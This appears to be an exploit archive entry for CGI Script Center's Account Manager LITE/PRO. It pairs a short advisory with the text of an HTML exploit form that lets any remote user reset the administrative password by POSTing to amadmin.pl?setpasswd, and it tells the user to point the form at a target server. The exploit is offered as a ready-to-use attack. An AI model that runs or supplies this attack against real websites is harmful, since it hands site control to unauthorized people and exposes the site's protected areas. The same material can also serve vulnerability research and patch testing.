source: https://www.securityfocus.com/bid/1604/info Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Account Manager. In order to accomplish this, a user would access the following URL with a POST command: http://target/cgibin/amadmin.pl?setpasswd This would grant the user full administrative privileges which includes the capability of granting and revoking user access to secured areas of the target website.

Account Manager LITE/PRO: Password Exploit!

n30

Please enter your password twice. Once to set it, and once to confirm it.

password
confirmation



Account Manager LITE/PRO Admin Passwerd Exploit

To Use Modify Source To Point to amadmin.pl on TARGET Server

mail-me